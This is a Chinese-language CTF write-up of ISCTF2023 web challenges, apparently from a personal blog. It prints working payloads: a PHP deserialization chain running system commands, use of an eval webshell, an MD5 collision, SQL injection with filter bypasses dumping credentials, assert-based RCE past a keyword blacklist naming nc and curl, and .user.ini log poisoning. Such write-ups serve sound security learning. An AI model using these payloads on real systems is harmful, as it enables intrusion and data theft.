ISCTF2023

圣杯战争!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "蓄力!咖喱棒!!<br>";
        return $functioin();
    }
}
class saber{
    public $weapon;
    public function __invoke(){
        echo "胜利!<br>";
        include($this->weapon);
    }
}
class summon{
    public $Saber;
    public $Rider;

    public function __wakeup(){
        echo "开始召唤从者!<br>";
        echo $this->Saber;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>

反序列化

1
2
3
4
5
6
7
__tostring() 表达方式错误导致魔术方法触发(把对象当成字符串调用)

__get() 调用的成员属性是私有属性或不存在时触发(返回值:不存在的成员属性的名称)

__invoke() 格式表达错误导致没魔术方法触发(把对象当成函数调用)

__wakeup() unserialize()之前会检查是否存在一个__wakeup()方法,如果存在,则会先调用__wakeup()方法

链子:__wakeup() -> __tostring() -> __get() -> ____invoke()

1
2
3
4
5
6
7
8
9
10
$a=new saber();
$a->weapon="data://text/plain,<?php echo system('cat /fl*');?>";
$b=new prepare();
$b->release=$a;
$c=new artifact();
$c->excalibuer=$b;
$c->arrow="asd";
$d=new summon();
$d->Saber=$c;
echo serialize($d);

payload:

1
O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:50:"data://text/plain,";}}s:5:"arrow";s:3:"asd";}s:5:"Rider";N;}

where_is_the_flag

1
2
3
4
5
6
7
<?php
//flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。
highlight_file(__FILE__);

//标准一句话木马~
eval($_POST[1]);
?>

蚁剑连接

第一段flag在flag.php中

1
2
3
<?php
$flag = "FLAG1:ISCTF{6ced";
?>

第二段flag在根目录中

1
6033-a4ec-

根目录里发现了一个冒红光的文件
img

1
2
3
4
5
6
7
8
\#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND

export创建环境变量

回到页面执行命令

1
2
1=system('printenv');
//HOSTNAME=d38fc96b0fdf SHLVL=2 HOME=/root FLAG3=4f5c-bb37-ee81a5ecc139} PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PWD=/var/www/localhost/htdocs FLAG=flag

绕进你的心里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
highlight_file(FILE);
error_reporting(0);
require 'flag.php';
$str = (String)$POST['pan_gu'];
$num = $GET['zhurong'];
$lida1 = $GET['hongmeng'];
$lida2 = $GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?> 
1
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){

md5强碰撞

payload:

1
hongmeng=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&shennong=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
1
if(preg_match("/[0-9]/", $num)){

preg_match数组绕过即可

1
?zhurong[]=1
1
2
3
4
5
6
7
if(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }

preg_match用回溯次数限制绕过

1
2
3
<?php

echo str_repeat('a',1000000);

easy_website

sql注入

1
1' or 1=1#

img

有错误回显,看到or被过滤(双写绕过)

空格也被过滤(%09绕过)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
爆库
1'%09ununionion%09seselectlect%09database()#
//users
爆表
'%09ununionion%09seselectlect%09group_concat(table_name)%09from%09infoorrmation_schema.tables%09where%09table_schema=database()#
//users
爆字段
'%09ununionion%09seselectlect%09group_concat(column_name)%09from%09infoorrmation_schema.columns%09where%09table_name='users'#
//用户$USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,user,password$登录成功
爆值
'%09ununionion%09seselectlect%09passwoorrd%09from%09users#
//21232f297a57a5a743894a0e4a801fc3:admin的md5加密值
'%09ununionion%09seselectlect%09passwoorrd%09from%09users%09limit%092,1#
//用户$ISCTF{**c**51a3cf4-adf5-4cd5-80f3-30**c**36**c**3262bd}$登录成功

wafr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
/*
Read /flaggggggg.txt
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(FILE);

if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $POST['code'])){//strings
    die("想读我文件?大胆。");
}
elseif (preg_match("/\^|||~|\$|\%|jay/i", $POST['code'])){
    die("无字母数字RCE?大胆!");
}
elseif (preg_match("/bash|nc|curl|sess|{|:|;/i", $POST['code'])){
    die("奇技淫巧?大胆!!");
}
elseif (preg_match("/fl|ag|.|x/i", $POST['code'])){
    die("大胆!!!");
}
else{
    assert($_POST['code']);
} 
1
assert($_POST[‘code’]);

assert和eval功能相同,但assert不用在函数后面加;

payload:反斜杠绕过

1
2
3
code=system('ls /')
//bin dev etc flaggggggg.txt home lib media mnt opt proc root run sbin srv start.sh sys tmp usr var
code=system('c\at /f*')

ez_ini

对上传的文件内容审查严格

尝试使用日志包含

上传.user.ini

1
2
GIF89a
auto_prepend_file=/var/log/nginx/access.log

抓包后在ua头后加入一句话木马

1
2
3
<?php system('ls');?>//不能用"",会被转码
<?php system('ls /');?>
<?php system('cat /flag');?>

猜flag的位置直接获取
.user.ini

1
2
GIF89a
auto_prepend_file=/flag

webinclude

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
function string_to_int_array(str){
        const intArr = [];

        for(let i=0;i<str.length;i++){
          const charcode = str.charCodeAt(i);/*返回字符串第一个字符的 Unicode 编码,这里直接理解为ascii码值*/

          const partA = Math.floor(charcode / 26);/*返回小于等于一个给定数字的最大整数,向下取整*/
          const partB = charcode % 26;

          intArr.push(partA);/*这两行的意思是在数组末尾添加新元素*/
          intArr.push(partB);
        }

        return intArr;
      }

      function int_array_to_text(int_array){
        let txt = '';

        for(let i=0;i<int_array.length;i++){
          txt += String.fromCharCode(97 + int_array[i]);/*返回ASCII码值对应的字符*/
        }

        return txt;
      }


const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(parameter))));
if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            window.location = 'flag.html';
          }else {
            document.getElementById('fail').style.display = '';
          }

python解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def text_to_int_array(txt):
    int_arr = []

    for char in txt:
        char_code = ord(char) - 97
        int_arr.append(char_code)

    return int_arr


def int_array_to_string(int_array):
    result_str = ''

    for i in range(0,len(int_array),2):
        result_str += chr(int_array[i]*26 + int_array[i+1])

    return result_str


encrypted_str = "dxdydxdudxdtdxeadxekdxea"
int_arr = int_array_to_string(text_to_int_array(int_array_to_string(text_to_int_array(encrypted_str))))
print(int_arr)

伪协议读取

payload:

1
?mihoyo=php://filter/convert.base64-encode/resource=flag.php
比赛
#比赛
ISCTF2023
http://example.com/2023/12/01/比赛/ISCTF2023/
作者
Englobe
发布于
2023年12月1日
许可协议